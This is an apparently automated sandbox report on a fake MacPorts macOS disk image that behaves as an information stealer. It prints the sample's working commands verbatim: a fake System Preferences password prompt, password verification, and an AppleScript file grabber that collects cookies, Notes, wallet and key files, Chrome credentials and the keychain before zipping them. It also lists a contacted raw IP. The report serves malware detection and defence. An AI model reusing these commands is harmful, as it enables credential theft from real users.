Malware Analysis Report

2024-10-24 21:57

Sample ID 240606-sb7laagf86
Target MacPorts_v.3.71.dmg
SHA256 b13c58dd3513330a179a157a3d03c19a5e25f6c6087fa2c7fcc5b1868dcb5868
Tags
discovery evasion execution
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

b13c58dd3513330a179a157a3d03c19a5e25f6c6087fa2c7fcc5b1868dcb5868

Threat Level: Shows suspicious behavior

The file MacPorts_v.3.71.dmg was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery evasion execution

Queries the macOS version information.

System Checks

File Deletion

AppleScript

Resource Forking

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-06 14:58

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-06 14:58

Reported

2024-06-06 15:13

Platform

macos-20240410-en

Max time kernel

309s

Max time network

298s

Command Line

[sh -c sudo /bin/zsh -c "open /Volumes/MacPorts"]

Signatures

Queries the macOS version information.

discovery
Description Indicator Process Target
N/A sh -c sw_vers N/A N/A
N/A sw_vers N/A N/A

System Checks

evasion
Description Indicator Process Target
N/A sh -c "system_profiler SPHardwareDataType" N/A N/A
N/A system_profiler SPHardwareDataType N/A N/A

File Deletion

evasion

AppleScript

execution
Description Indicator Process Target
N/A sh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'" N/A N/A
N/A osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer" N/A N/A
N/A sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'" N/A N/A
N/A osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer" N/A N/A
N/A sh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"960177838\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"960177838:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'" N/A N/A
N/A osascript -e "set baseFolderPath to (path to home folder as text) & \"960177838\"" -e "set fileGrabberFolderPath to (path to home folder as text) & \"960177838:FileGrabber:\"" -e "tell application \"Finder\"" -e "set username to short user name of (system info)" -e try -e "if not (exists folder fileGrabberFolderPath) then" -e "make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}" -e "end if" -e "set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")" -e try -e "duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing" -e "end try" -e "set homePath to path to home folder as string" -e "set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"" -e try -e "duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing" -e "end try" -e "set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}" -e "set desktopFiles to every file of desktop" -e "set documentsFiles to every file of folder \"Documents\" of (path to home folder)" -e "repeat with aFile in (desktopFiles & documentsFiles)" -e "set fileExtension to name extension of aFile" -e "if fileExtension is in extensionsList then" -e "set fileSize to size of aFile" -e "if fileSize ≤ 51200 then" -e "duplicate aFile to folder fileGrabberFolderPath with replacing" -e "end if" -e "end if" -e "end repeat" -e "end try" -e "end tell" N/A N/A
N/A osascript -e "display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop" N/A N/A
N/A osascript -e "tell application \"Terminal\" to set visible of front window to false" N/A N/A
N/A sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'" N/A N/A
N/A osascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer" N/A N/A
N/A sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'" N/A N/A
N/A sh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'" N/A N/A

Resource Forking

evasion
Description Indicator Process Target
N/A /System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper N/A N/A
N/A /System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper N/A N/A

Processes

/bin/sh

[sh -c sudo /bin/zsh -c "open /Volumes/MacPorts"]

/bin/bash

[sh -c sudo /bin/zsh -c "open /Volumes/MacPorts"]

/usr/bin/sudo

[sudo /bin/zsh -c open /Volumes/MacPorts]

/bin/zsh

[/bin/zsh -c open /Volumes/MacPorts]

/usr/bin/open

[open /Volumes/MacPorts]

/usr/libexec/xpcproxy

[xpcproxy com.apple.spindump]

/usr/sbin/spindump

[/usr/sbin/spindump]

/usr/libexec/xpcproxy

[xpcproxy com.apple.spindump_agent]

/usr/libexec/spindump_agent

[/usr/libexec/spindump_agent]

/usr/sbin/spctl

[/usr/sbin/spctl --assess --type execute /Applications/OneDrive.app]

/bin/launchctl

[/bin/launchctl kill SIGTERM system/com.microsoft.OneDriveUpdaterDaemon]

/bin/launchctl

[/bin/launchctl kill SIGTERM system/com.microsoft.OneDriveStandaloneUpdaterDaemon]

/usr/libexec/xpcproxy

[xpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E]

/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService

[/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService]

/usr/libexec/xpcproxy

[xpcproxy com.apple.quicklook.ui.helper]

/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper

[/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper]

/usr/libexec/xpcproxy

[xpcproxy com.apple.Terminal.2100]

/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal

[/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal]

/usr/libexec/xpcproxy

[xpcproxy com.apple.metadata.mdwrite]

/usr/bin/login

[login -pf run]

/bin/zsh

[-zsh]

/usr/libexec/path_helper

[/usr/libexec/path_helper -s]

/usr/bin/locale

[locale LC_CTYPE]

/usr/bin/login

[login -pf run]

/bin/zsh

[-zsh]

/usr/libexec/path_helper

[/usr/libexec/path_helper -s]

/usr/bin/locale

[locale LC_CTYPE]

/Volumes/MacPorts/MacPorts

[/Volumes/MacPorts/MacPorts]

/bin/sh

[sh -c osascript -e 'tell application "Terminal" to set visible of front window to false']

/bin/bash

[sh -c osascript -e 'tell application "Terminal" to set visible of front window to false']

/usr/bin/osascript

[osascript -e tell application "Terminal" to set visible of front window to false]

/bin/sh

[sh -c mkdir /Users/run/960177838]

/bin/bash

[sh -c mkdir /Users/run/960177838]

/bin/mkdir

[mkdir /Users/run/960177838]

/bin/sh

[sh -c sw_vers]

/bin/bash

[sh -c sw_vers]

/usr/bin/sw_vers

[sw_vers]

/bin/sh

[sh -c system_profiler SPHardwareDataType]

/bin/bash

[sh -c system_profiler SPHardwareDataType]

/usr/sbin/system_profiler

[system_profiler SPHardwareDataType]

/bin/sh

[sh -c system_profiler SPDisplaysDataType]

/bin/bash

[sh -c system_profiler SPDisplaysDataType]

/usr/sbin/system_profiler

[system_profiler SPDisplaysDataType]

/bin/sh

[sh -c dscl /Local/Default -authonly run ""]

/bin/bash

[sh -c dscl /Local/Default -authonly run ""]

/usr/bin/dscl

[dscl /Local/Default -authonly run ]

/bin/sh

[sh -c osascript -e 'display dialog "To launch the application, you need to update the system settings \n\nPlease enter your password." with title "System Preferences" with icon caution default answer "" giving up after 30 with hidden answer']

/bin/bash

[sh -c osascript -e 'display dialog "To launch the application, you need to update the system settings \n\nPlease enter your password." with title "System Preferences" with icon caution default answer "" giving up after 30 with hidden answer']

/usr/bin/osascript

[osascript -e display dialog "To launch the application, you need to update the system settings \n\nPlease enter your password." with title "System Preferences" with icon caution default answer "" giving up after 30 with hidden answer]

/usr/libexec/xpcproxy

[xpcproxy com.apple.ReportMemoryException]

/usr/libexec/ReportMemoryException

[/usr/libexec/ReportMemoryException]

/bin/sh

[sh -c osascript -e 'display dialog "To launch the application, you need to update the system settings You entered an invalid password.\n\nPlease enter your password." with title "System Preferences" with icon caution default answer "" giving up after 30 with hidden answer']

/bin/bash

[sh -c osascript -e 'display dialog "To launch the application, you need to update the system settings You entered an invalid password.\n\nPlease enter your password." with title "System Preferences" with icon caution default answer "" giving up after 30 with hidden answer']

/usr/bin/osascript

[osascript -e display dialog "To launch the application, you need to update the system settings You entered an invalid password.\n\nPlease enter your password." with title "System Preferences" with icon caution default answer "" giving up after 30 with hidden answer]

/bin/sh

[sh -c osascript -e 'display dialog "To launch the application, you need to update the system settings You entered an invalid password.\n\nPlease enter your password." with title "System Preferences" with icon caution default answer "" giving up after 30 with hidden answer']

/bin/bash

[sh -c osascript -e 'display dialog "To launch the application, you need to update the system settings You entered an invalid password.\n\nPlease enter your password." with title "System Preferences" with icon caution default answer "" giving up after 30 with hidden answer']

/usr/bin/osascript

[osascript -e display dialog "To launch the application, you need to update the system settings You entered an invalid password.\n\nPlease enter your password." with title "System Preferences" with icon caution default answer "" giving up after 30 with hidden answer]

/bin/sh

[sh -c dscl /Local/Default -authonly run root]

/bin/bash

[sh -c dscl /Local/Default -authonly run root]

/usr/bin/dscl

[dscl /Local/Default -authonly run root]

/bin/sh

[sh -c mkdir -p '/Users/run/960177838/Chromium/Chrome']

/bin/bash

[sh -c mkdir -p '/Users/run/960177838/Chromium/Chrome']

/bin/mkdir

[mkdir -p /Users/run/960177838/Chromium/Chrome]

/bin/sh

[sh -c osascript -e 'set baseFolderPath to (path to home folder as text) & "960177838"' -e 'set fileGrabberFolderPath to (path to home folder as text) & "960177838:FileGrabber:"' -e 'tell application "Finder"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:"FileGrabber"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")' -e 'try' -e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & "Library:Group Containers:group.com.apple.notes:"' -e 'try' -e 'duplicate file "NoteStore.sqlite" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {"txt", "docx", "rtf", "doc", "wallet", "keys", "key"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder "Documents" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell']

/bin/bash

[sh -c osascript -e 'set baseFolderPath to (path to home folder as text) & "960177838"' -e 'set fileGrabberFolderPath to (path to home folder as text) & "960177838:FileGrabber:"' -e 'tell application "Finder"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:"FileGrabber"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")' -e 'try' -e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & "Library:Group Containers:group.com.apple.notes:"' -e 'try' -e 'duplicate file "NoteStore.sqlite" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {"txt", "docx", "rtf", "doc", "wallet", "keys", "key"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder "Documents" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell']

/usr/bin/osascript

[osascript -e set baseFolderPath to (path to home folder as text) & "960177838" -e set fileGrabberFolderPath to (path to home folder as text) & "960177838:FileGrabber:" -e tell application "Finder" -e set username to short user name of (system info) -e try -e if not (exists folder fileGrabberFolderPath) then -e make new folder at folder baseFolderPath with properties {name:"FileGrabber"} -e end if -e set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:") -e try -e duplicate file "Cookies.binarycookies" of folder safariFolder to folder baseFolderPath with replacing -e end try -e set homePath to path to home folder as string -e set sourceFilePath to homePath & "Library:Group Containers:group.com.apple.notes:" -e try -e duplicate file "NoteStore.sqlite" of folder sourceFilePath to folder baseFolderPath with replacing -e end try -e set extensionsList to {"txt", "docx", "rtf", "doc", "wallet", "keys", "key"} -e set desktopFiles to every file of desktop -e set documentsFiles to every file of folder "Documents" of (path to home folder) -e repeat with aFile in (desktopFiles & documentsFiles) -e set fileExtension to name extension of aFile -e if fileExtension is in extensionsList then -e set fileSize to size of aFile -e if fileSize ≤ 51200 then -e duplicate aFile to folder fileGrabberFolderPath with replacing -e end if -e end if -e end repeat -e end try -e end tell]

/usr/libexec/xpcproxy

[xpcproxy com.apple.DesktopServicesHelper.EBB1B5F8-0695-41DD-9B6C-8038A0D99826]

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper

[/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper]

/bin/sh

[sh -c ditto -c -k --sequesterRsrc --keepParent /Users/run/960177838 /Users/run/960177838.zip --norsrc --noextattr]

/bin/bash

[sh -c ditto -c -k --sequesterRsrc --keepParent /Users/run/960177838 /Users/run/960177838.zip --norsrc --noextattr]

/usr/bin/ditto

[ditto -c -k --sequesterRsrc --keepParent /Users/run/960177838 /Users/run/960177838.zip --norsrc --noextattr]

/bin/sh

[sh -c rm -rf /Users/run/960177838]

/bin/bash

[sh -c rm -rf /Users/run/960177838]

/bin/rm

[rm -rf /Users/run/960177838]

/bin/sh

[sh -c rm /Users/run/960177838.zip]

/bin/bash

[sh -c rm /Users/run/960177838.zip]

/bin/rm

[rm /Users/run/960177838.zip]

/bin/sh

[sh -c osascript -e 'display dialog "Some error occurred while running the application." buttons {"OK"} default button 1 with icon stop']

/bin/bash

[sh -c osascript -e 'display dialog "Some error occurred while running the application." buttons {"OK"} default button 1 with icon stop']

/usr/bin/osascript

[osascript -e display dialog "Some error occurred while running the application." buttons {"OK"} default button 1 with icon stop]

Network

Country Destination Domain Proto
US 151.101.67.6:443 tcp
US 8.8.8.8:53 mobile.events.data.trafficmanager.net udp
US 20.42.73.27:443 tcp
US 8.8.8.8:53 api.apple-cloudkit.fe2.apple-dns.net udp
US 8.8.8.8:53 b._dns-sd._udp.0.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 db._dns-sd._udp.0.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 b._dns-sd._udp.0.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 db._dns-sd._udp.0.0.127.10.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 bag-cdn-lb.itunes-apple.com.akadns.net udp
US 8.8.8.8:53 cds.apple.com udp
BE 104.68.86.71:443 cds.apple.com tcp
US 8.8.8.8:53 help.apple.com udp
GB 2.21.189.171:443 help.apple.com tcp
GB 2.21.189.171:443 help.apple.com tcp
DE 77.91.77.87:80 77.91.77.87 tcp

Files

/dev/ttys000

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

/Users/run/Library/Saved Application State/com.apple.osascript.savedState/data.data

MD5 8e3ec1dd3c72b0ebaa14c06fe76dfdb1
SHA1 8db4b0568f5663c70569eff504b66f2990026d6d
SHA256 395b057aa4e30de59cf0fa646d080d1283c8701ce2d50447605c4a860e46079f
SHA512 a2dd8c719c8d3cce041b7fb9a15819df7c29787106875fb2bcd31f621cc2112622015b638029aef6c7158625651304549d68e4b727465653c6b29792b2c368cf

/Users/run/Library/Saved Application State/com.apple.osascript.savedState/data.data

MD5 813974f888a1f4550e3e9d7bdf99b441
SHA1 39f2833d37f2320163de6dd8953e6fc448b4480c
SHA256 7324420db7267c97ba19d10ad35aa1fd9b117cb16d999fdd938a1c5ed2b77a32
SHA512 4d94eefea65496f3b68cf734df30f990c075070fabefe7852cfe7885f6f56b0a3b25f88ce230bdf5a76f32920964b7cd8f35e0c61bef4d60bcbbd211250360c6

/Users/run/Library/Saved Application State/com.apple.osascript.savedState/data.data

MD5 269e0850367717aa532dd71f12317060
SHA1 276b059ce7d483aab35d7b8b16149a09dc902092
SHA256 eb508aaf05a8c58d9a7855de335d8fd72741f57ef681fe512c24b5179f8fd7cf
SHA512 828536e67fb661d8cd7c1f3c232fd2dff323cb0aa4cf1d8edb250b9df091f1af55f2cf70ebad049229b2575d6ec0d1bbab3139d8b6b0cc469499821d72f57d22

/Users/run/./960177838/password-entered

MD5 63a9f0ea7bb98050796b649e85481845
SHA1 dc76e9f0c0006e8f919e0c515c66dbba3982f785
SHA256 4813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2
SHA512 99adc231b045331e514a516b4b7680f588e3823213abe901738bc3ad67b2f6fcb3c64efb93d18002588d3ccc1a49efbae1ce20cb43df36b38651f11fa75678e8

/Users/run/./960177838/Sysinfo.txt

MD5 31717a21202f4dbab34a72c86ae4f3f2
SHA1 78fab4a3136000513a8f66f2d81d19cb2473338d
SHA256 6e50323737f1ebceb1d9f4e1fb36e5b02ff684de7711f54df08128e966f130da
SHA512 4c79b4b4705b897f2e43aec1ad622df2af929fc58a4e7c44d052b2e39c789bb266d4efc150e00896ac530aede6187c60dba572e78ada2b620f2f4e46f0c6cf5c

/Users/run/./960177838/Chromium/Chrome/Password1

MD5 b6914d8e5cb470236eceed8d6f8b4fb7
SHA1 cdff8880e9fa7630fc8d57af4669365b5ab29b60
SHA256 45bda2415419c24d2526ae60cae5ee1d66bc8d2cc986bb9e94c0f3c414af06c1
SHA512 1c491cfeb2b883ed20a43e16d7bf620520f4b770c8727ffb83e02554aa6aa54def4732460bcff82014050f7a1fba38e01f5570cacfbfcef6da6f2f795dc56ee7

/Users/run/./960177838/Chromium/Chrome/Cookies2

MD5 2a3fa78b5f55b529a2698ad187c80204
SHA1 cbbda35512038de511ac23b0aed12e9e86bcc796
SHA256 d52ad17cc5096119732f06311ef2e25005c2a00f551c9684e2d655cbc846455b
SHA512 e9b113ec0c6a888e059cf625b0bfb128d11a55970fed12df30848c9f836c5f36b2660abb4e2a820e7dedd6f0ead312edec1c6cd645f14091d98b42f696bda9ab

/Users/run/./960177838/Chromium/Chrome/Autofill0

MD5 4e9060f76c1cb5b54005dc6640a58f0d
SHA1 04a1e6791ae55612d9b63f23ccb37eec398b3d27
SHA256 5b6dd3116e1d3ecbf6d07ecfc03f1537ab00ce91336cc7c6cddda6df0c9984d3
SHA512 be921e02bb810fb867c1de3e3c2a9c3b04c84188d6a9eae60b73558bd4748c1451161da8fba2c8e74f225be4b8a6f0e98276fe1e397b0083fcbbd4ebdf32e148

/Users/run/./960177838/login-keychain

MD5 c4e33ed5406867476b3bf0e0a705cc3c
SHA1 dcf5c174ae9a6463e5ed4532cee3a6be42ad65a1
SHA256 67b4ea83a64d881b90746716e1dbafedbc93f7e7211619666614aba3b6b00d2a
SHA512 3cdb354541094d829ca6625f56bff84b27dd2685243173eba1b7636d99db3d87bb28d27ac0f3d970f6e6f005664209d47b4e1509a75e4fc05f746de53496ad6d